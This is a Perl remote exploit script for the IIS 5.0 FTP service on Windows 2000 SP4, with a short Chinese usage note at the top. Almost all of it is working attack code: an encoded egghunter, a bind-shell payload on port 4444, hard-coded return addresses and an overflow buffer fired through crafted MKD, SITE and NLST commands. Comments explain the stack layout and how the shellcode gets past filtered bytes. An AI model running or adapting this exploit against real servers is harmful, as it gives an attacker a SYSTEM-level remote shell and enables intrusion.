绑定4444端口,Windows 2000 CN + SP4 测试通过,需要能建目录的用户,偏移地址若不通用,请自行修改。
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit 
# Win2k SP4 targets 
# bug found & exploited by Kingcope, kcope2<at>googlemail.com 
# Affects IIS6 with stack cookie protection 
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt


use warnings;
use IO::Socket;
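$| = 1;   # autoflush STDOUT so the FTP dialogue is shown as it happens

# Stage one: the egghunter the file header mentions. After a short FPU
# GetPC prefix (the same d9 72 f4 FSTENV trick the finder stub uses) the
# remaining bytes are printable ASCII. The SITE commands later park this on
# the server's stack and the finder stub jumps to it; the tag it hunts for
# is presumably the "T00WT00W" prefix on $shell. 133 bytes.
our $sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
          "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
          "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
          "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
          "\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
          "\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
          "\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
          "\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
          "\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
# NOTE(review): the generator line below appears to describe stage two
# ($shell, whose leading bytes look like a shikata_ga_nai decoder) rather
# than this blob:
#  ./msfpayload windows/shell_bind_tcp R |  ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"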

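# Stage two: the bind shell (port 4444 on the target, see the file header),
# i.e. windows/shell_bind_tcp run through x86/shikata_ga_nai with bad chars
# \x00\x0a\x0d. It is prefixed with the egg tag "T00WT00W" so the egghunter
# can locate it; it is handed to the server as a PASS argument below.
# 8 + 369 = 377 bytes.
our $shell = "T00WT00W" .
    "\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
    "\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
    "\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
    "\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
    "\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
    "\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
    "\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
    "\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
    "\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
    "\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
    "\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
    "\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
    "\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
    "\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
    "\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
    "\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
    "\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
    "\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
    "\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
    "\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
    "\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
    "\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
    "\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
    "\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
    "\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";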


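print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";

# Exactly two arguments: the target host and the address the target's FTP
# server will connect back to for the PORT/NLST data channel.
if (@ARGV != 2) {
    print "usage: iiz5.pl <target> <your local ip>\n";
    exit(0);
}

srand(time());
my $port  = int(rand(31337 - 1022)) + 1025;   # data-channel listener, 1025..31339
my $locip = $ARGV[1];
$locip =~ s/\./,/g;                           # PORT wants h1,h2,h3,h4

# Send one FTP command line and echo the single reply line read back.
# Returns the reply, or undef when the server has gone away (a hijacked or
# crashed server drops the control connection without answering).
sub ftp_cmd {
    my ($fh, $line) = @_;
    print $fh "$line\r\n";
    my $reply = <$fh>;
    print $reply if defined $reply;
    return $reply;
}

my $pid = fork();
die "fork failed: $!\n" unless defined $pid;

if ($pid) {
    # ---- parent: drive the FTP control connection -------------------------
    my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                     PeerPort => '21',
                                     Proto    => 'tcp');
    unless ($sock) {
        kill 'TERM', $pid;                    # do not leave the listener orphaned
        die "connect to $ARGV[0]:21 failed: $@\n";
    }

    # Hard-coded for the author's Windows 2000 CN SP4 box; change these two
    # addresses if they do not fit the target (see the note at the top).
    my $patch   = "\x7e\xd1\xf9\x7f";
    my $retaddr = "\x9B\xB1\xF4\x77";

    # Alternative pair (from wordexp):
    #$patch   = "\x90\x80\xb7\x6f";
    #$retaddr = "\xcd\x60\xb6\x6f";

    # Finder-marker + egghunter, 'V'-padded to roughly 500 bytes. Two extra
    # 'K' were put in front of "SEXY" so the marker is 4-byte aligned: the
    # finder stub below scans with REPNE SCASD and would miss it otherwise.
    my $v = "KKKSEXY" . $sc . "V" x (500 - length($sc) - 5);

    # Stack layout at the moment of the overflow (byte offsets), from the
    # original notes. The earlier single-jump version of the buffer was:
    #   "A" x 104 . $patch . $patch . "A" x 52 . $patch . "AAAA" . $retaddr . $patch . "Aa4Aa5Aa6Aa7Aa8Aa9Ab"
    #
    #   0    finder stub, 'A'-padded to 104
    #   104  $patch   108  $patch
    #   112  EB 8E 44 44   JMP SHORT -0x72 -> offset 0, the finder stub
    #   116  'A' x 48
    #   164  $patch   168  'AAAA'   172  $retaddr   176  $patch
    #   180  'A' x 16
    #   196  E2 AA         LOOP -0x56 -> offset 112; control lands here first
    #                      after the function returns and hops again because
    #                      the stub is too far away for one short jump
    #   198  'NN'
    #
    # The finder stub as originally written. The byte version drops the
    # leading int 3, which is why it patches [EBX+27h] instead of [EBX+28h]:
    #
    #   start:  MOV  EDX,ESP
    #           (FPU op, db d2)               ; gives FSTENV an EIP to record
    #           FSTENV [EDX-0Ch]              ; d9 72 f4
    #           POP  EBP                      ; EBP = address of the FPU op
    #           PUSH EBP
    #           POP  EBX
    #           PUSH 76h
    #           POP  EAX
    #   xorsc:  XOR  BYTE PTR [EBX+28h],AL    ; 89h ^ 76h = FFh, see "decode"
    #   findsc: MOV  EAX,66666666h
    #           SUB  EAX,66566666h            ; EAX = 00100000h, scan start
    #           PUSH EAX
    #           POP  EDI
    #           PUSH 21212121h
    #           POP  ECX                      ; scan length
    #           MOV  EAX,59584553h            ; "SEXY" as it sits in memory
    #           REPNE SCASD                   ; EDI ends just past the marker
    #   decode: db 89h,0E7h                   ; becomes FF E7 = JMP EDI -> $sc
    #
    # Jumping to the located code needs CALL/JMP, whose encodings contain
    # 0xFF; IIS filters that byte out of the command, so the stub carries
    # 0x89 and XORs it back into 0xFF at run time. alpha2-encoding the stub
    # was considered but came out too long.
    my $myfindsc =
        "\x8b\xd4\xdb\xd2\xd9\x72\xf4\x5d\x55\x5b\x6a\x76\x58" .
        "\x30\x43\x27\xb8\x66\x66\x66\x66\x2d\x66\x66\x5F\x66" .
        "\x50\x5f\x68\x21\x21\x21\x21\x59\xb8\x53\x45\x58\x59" .
        "\xf2\xaf\x89\xe7";

    my $c = $myfindsc . "A" x (104 - length($myfindsc)) .
            $patch . $patch . "\xEB\x8E\x44\x44" . "A" x 48 .
            $patch . "AAAA" . $retaddr . $patch . "A" x 16 . "\xE2\xAA" . "NN";

    my $banner = <$sock>;
    print $banner if defined $banner;

    # Two deliberately failed logins whose "password" is the bind-shell
    # stage. Presumably this parks $shell in the FTP process' memory for the
    # egghunter to find later (which can take a minute or two, see header).
    ftp_cmd($sock, "USER anonimoos");
    ftp_cmd($sock, "PASS $shell");
    ftp_cmd($sock, "USER anonimoos");
    ftp_cmd($sock, "PASS $shell");

    # Real login: the account must be allowed to create directories.
    ftp_cmd($sock, "USER anonymous");
    ftp_cmd($sock, "PASS anonymous");
    ftp_cmd($sock, "MKD w00t$port");
    # Park the marker + egghunter on the process stack, five times over.
    ftp_cmd($sock, "SITE $v") for 1 .. 5;
    ftp_cmd($sock, "CWD w00t$port");
    ftp_cmd($sock, "MKD CCCC$c");             # the fourth 'C' 4-byte-aligns $c
    ftp_cmd($sock, "PORT $locip," . int($port / 256) . "," . int($port % 256));

    # TRIGGER. A hijacked server may never answer; this read blocks until
    # the control connection drops.
    ftp_cmd($sock, "NLST $c*/../C*/");
}
else {
    # ---- child: accept the data connection the server opens for PORT ------
    # This only receives the NLST directory listing, if any. The shell itself
    # is the bind shell on port 4444 of the target and has to be reached with
    # a separate connection once the egg has been found. The listener is
    # bound on all interfaces.
    my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0",
                                         LocalPort => $port,
                                         Proto     => 'tcp',
                                         Listen    => 1);
    die "Could not create socket: $!\n" unless $servsock;
    my $new_sock = $servsock->accept();
    die "accept failed: $!\n" unless $new_sock;
    while (<$new_sock>) {
        print $_;
    }
    close($servsock);
}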

# Cheerio, 

#Kingcope